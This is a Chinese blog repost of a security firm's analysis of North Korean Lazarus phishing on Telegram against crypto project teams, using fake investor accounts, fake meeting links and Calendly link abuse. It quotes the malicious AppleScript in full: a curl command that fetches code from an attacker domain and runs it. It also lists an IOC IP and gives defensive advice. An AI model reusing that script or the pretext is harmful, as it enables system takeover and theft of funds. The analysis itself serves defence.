统计
  • 建站日期:2022-01-17
  • 文章总数:3630 篇
  • 评论总数:7656条
  • 分类总数:43 个
  • 最后更新:1天前

朝鲜黑客 Telegram 定点欺诈攻击分析

首页 资讯动态 正文
广告
广告
广告
广告

早在 2022 年,慢雾安全团队就通过慢雾 BTI 情报网络发现朝鲜黑客 Lazarus 团伙开启针对加密货币行业的大规模 Telegram 欺诈钓鱼行动,近期朝鲜黑客更是开始冒充知名投资机构,对项目方进行欺诈钓鱼,鉴于影响范围较大,慢雾在此进行分析。

85cbed94e6c4e8616044e9c6bf5c2735_640_wx_fmt=jpeg&from=appmsg.jpg

一、挑选知名投资机构作为冒充对象,然后建立虚假的 Telegram 帐号:

93c3422b4a9f7ab87b730d6a1751f4d1_640_wx_fmt=jpeg&from=appmsg.jpg

二、寻找知名的 DeFi 项目方作为目标,以要投资他们为名,使用虚假帐号开始实施骗局:

f673f8dafeb3786d732550df00f0a310_640_wx_fmt=jpeg&from=appmsg.jpg

朝鲜黑客会先对目标发起聊天以建立联系,如果项目方看到消息且安全意识不足,就会出现下图的一幕:

0b9bab73e0dfc85799af8e2bf24fa368_640_wx_fmt=jpeg&from=appmsg.jpg

e1e0a67a43e346d2fa4eb6070182cdf6_640_wx_fmt=png&from=appmsg.png

朝鲜黑客骗取项目方的信任后便开始约会议,此处有两种攻击手法:
1. 邀请项目方加入如 ***.group-meeting.team 之类的会议,假装询问对方是否有时间安排会面或详谈,并主动提供恶意会议链接。项目方点击链接后会看到地区访问限制,这时朝鲜黑客会接着诱使项目方下载并运行其提供的“修改定位”的恶意脚本。一旦项目方照做,那么他的电脑就会被朝鲜黑客控制,导致资金被盗取。下面是恶意脚本 IP_Request.scpt 的内容:
set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"
set sc to do shell script "curl -L -k""& fix_url &"\""
run script sc

代码解释:

96117083d27759eed30a99e4b2d7155d_640_wx_fmt=png&from=appmsg.png

2. 利用 Calendly 会议预定系统的“添加自定义链接”在事件页面的功能,在事件上插入恶意链接发起钓鱼攻击。由于 Calendly 与大多数项目方的日常工作背景很好地融合在一起,因此这些恶意链接不容易引起怀疑,项目方容易无意中点击恶意链接,下载并执行恶意代码,此时朝鲜黑客同样可以获取到项目方系统相关信息或权限。

22e26236596e034bc61d850abd3ce541_640_wx_fmt=png&from=appmsg.png

 

安全团队在 2023 年 11 月 30 日 也对相关攻击手法做过提醒:

b81d947e26a80360c32d0f2a99653ac7_640_wx_fmt=png&from=appmsg.png

基础 IOC:
IP: 104.168.137.21
Domains:

ff3d5323033ce892f1e51ab80f02020f_640_wx_fmt=png&from=appmsg.png

恶意攻击样例:

6f8adfcad605253345781ebdf623dfed_640_wx_fmt=png&from=appmsg.png

鉴于此类诈骗行为仍在持续发生,建议 Web3 用户务必确保在添加好友时通过双重渠道确认对方的真实性,同时对 Telegram 开启双重身份验证(2FA),随时注意交易安全,以免遭受资金损失。
一旦不慎运行相关木马,请第一时间转移相关资金、断网杀毒,同时修改目标电脑上(包括浏览器里记录的)相关账号密码等信息。

版权说明
文章采用: 《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权。
版权声明:本站资源来自互联网收集,仅供用于学习和交流,请勿用于商业用途。如有侵权、不妥之处,请联系客服并出示版权证明以便删除!
百度快速收录权限被收回,是为VIP俱乐部提供吗?
« 上一篇 12-09
安卓笔趣阁v1.0.0绿化版
下一篇 » 12-09

发表评论

  • 泡泡
  • 阿呆
  • 阿鲁
  • 蛆音娘
    没有更多评论了